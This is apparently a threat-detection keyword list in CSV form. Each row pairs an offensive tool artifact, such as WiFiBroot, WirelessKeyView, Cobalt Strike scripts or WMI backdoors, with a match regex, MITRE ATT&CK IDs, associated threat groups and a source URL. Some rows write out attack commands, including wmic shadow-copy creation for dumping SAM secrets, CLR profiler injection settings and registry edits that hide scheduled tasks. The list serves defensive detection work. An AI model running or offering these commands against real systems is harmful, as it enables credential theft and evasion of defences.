"*wireless/captures.py*",".{0,1000}wireless\/captures\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62841"
"*wireless/cracker.py*",".{0,1000}wireless\/cracker\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62842"
"*wireless/pmkid.py*",".{0,1000}wireless\/pmkid\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62843"
"*wireless/sniper.py*",".{0,1000}wireless\/sniper\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62844"
"*wireless_attack_tools.py*",".{0,1000}wireless_attack_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","62845"
"*wirelesskeyview.exe*",".{0,1000}wirelesskeyview\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62846"
"*wirelesskeyview.exe*",".{0,1000}wirelesskeyview\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62847"
"*wirelesskeyview.zip*",".{0,1000}wirelesskeyview\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62848"
"*wirelesskeyview.zip*",".{0,1000}wirelesskeyview\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62849"
"*WirelessKeyView_x64.exe*",".{0,1000}WirelessKeyView_x64\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62850"
"*WirelessKeyView_x64.exe*",".{0,1000}WirelessKeyView_x64\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62851"
"*wirelesskeyview-no-command-line.zip*",".{0,1000}wirelesskeyview\-no\-command\-line\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62852"
"*wirelesskeyview-no-command-line.zip*",".{0,1000}wirelesskeyview\-no\-command\-line\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62853"
"*wirelesskeyview-x64.zip*",".{0,1000}wirelesskeyview\-x64\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62854"
"*wirelesskeyview-x64.zip*",".{0,1000}wirelesskeyview\-x64\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62855"
"*wiresocks-main*",".{0,1000}wiresocks\-main.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","62870"
"*wiresocks-redsocks*",".{0,1000}wiresocks\-redsocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","62871"
"*WithSecureLabs/physmem2profit*",".{0,1000}WithSecureLabs\/physmem2profit.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","62886"
"*Witness.py*",".{0,1000}Witness\.py.{0,1000}","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/FortyNorthSecurity/EyeWitness","1","1","#linux","N/A","N/A","10","5263","870","2024-10-22T22:50:50Z","2014-02-26T16:23:25Z","62887"
"*WitnessMe*",".{0,1000}WitnessMe.{0,1000}","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Reconnaissance","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","N/A","8","747","111","2024-09-23T18:34:55Z","2019-07-06T05:25:10Z","62888"
"*wkhtmltoimage.py*",".{0,1000}wkhtmltoimage\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","62890"
"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*",".{0,1000}WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","62891"
"*WKL-Sec/dcomhijack*",".{0,1000}WKL\-Sec\/dcomhijack.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","62892"
"*WKL-Sec/dcomhijack*",".{0,1000}WKL\-Sec\/dcomhijack.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","62893"
"*WKL-Sec/HiddenDesktop*",".{0,1000}WKL\-Sec\/HiddenDesktop.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","62894"
"*WKL-Sec/Winsocky*",".{0,1000}WKL\-Sec\/Winsocky.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","62895"
"*wkssvc_##*",".{0,1000}wkssvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","62896"
"*WLAN-Windows-Passwords-Discord-Exfiltration*",".{0,1000}WLAN\-Windows\-Passwords\-Discord\-Exfiltration.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","62897"
"*wlbsctrl_payload.bat*",".{0,1000}wlbsctrl_payload\.bat.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","62898"
"*WldpBypass.cs*",".{0,1000}WldpBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","62899"
"*wlh3dpptx2gt7nsxcor37a3kiyaiy6qwhdv7o6nl6iuniu5ycze5ydid.onion*",".{0,1000}wlh3dpptx2gt7nsxcor37a3kiyaiy6qwhdv7o6nl6iuniu5ycze5ydid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62900"
"*wl-lic -d *.dat -r *.rsa*",".{0,1000}wl\-lic\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","62901"
"*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*",".{0,1000}wl\-lic\s\-h\sHWID\s\-m\smain_hash\s\-d\sregkey2\.dat\s\-r\sregkey2\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","62902"
"*wmap_crawler.rb*",".{0,1000}wmap_crawler\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62903"
"*wmeye.csproj*",".{0,1000}wmeye\.csproj.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","62904"
"*wmeye.exe *",".{0,1000}wmeye\.exe\s.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","62905"
"*wmeye.sln*",".{0,1000}wmeye\.sln.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","62906"
"*WMI KeeTheifLurker *",".{0,1000}WMI\sKeeTheifLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","62907"
"*WMI KeeTheifLurker * Created*",".{0,1000}WMI\sKeeTheifLurker\s.{0,1000}\sCreated.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","62908"
"*Wmi_Persistence.ps1*",".{0,1000}Wmi_Persistence\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","62909"
"*wmi_persistence.rb*",".{0,1000}wmi_persistence\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62910"
"*WMIBackdoor.ps1*",".{0,1000}WMIBackdoor\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","10","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","62911"
"*wmic /interactive:off nicconfig where TcpipNetbiosOptions=0 call SetTcpipNetbios 2*",".{0,1000}wmic\s\/interactive\:off\snicconfig\swhere\sTcpipNetbiosOptions\=0\scall\sSetTcpipNetbios\s2.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","62913"
"*wmic /namespace:\\root\default path stdRegProv call DeleteValue *SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\*=*SD*",".{0,1000}wmic\s\/namespace\:\\\\root\\default\spath\sstdRegProv\scall\sDeleteValue\s.{0,1000}SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\=.{0,1000}SD.{0,1000}","offensive_tool_keyword","wmic","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker - COZY BEAR","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","#registry","risk of False positive","9","10","N/A","N/A","N/A","N/A","62914"
"*wmic ENVIRONMENT create name=""COR_ENABLE_PROFILING"",username=""%username%"",VariableValue=""1""*",".{0,1000}wmic\sENVIRONMENT\screate\sname\=\""COR_ENABLE_PROFILING\"",username\=\""\%username\%\"",VariableValue\=\""1\"".{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","62921"
"*wmic ENVIRONMENT create name=""COR_PROFILER"",username=""%username%"",VariableValue=""{11111111-1111-1111-1111-111111111111}""*",".{0,1000}wmic\sENVIRONMENT\screate\sname\=\""COR_PROFILER\"",username\=\""\%username\%\"",VariableValue\=\""\{11111111\-1111\-1111\-1111\-111111111111\}\"".{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","62922"
"*wmic shadowcopy call create Volume='C:\'*",".{0,1000}wmic\sshadowcopy\scall\screate\sVolume\=\'C\:\\\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62949"
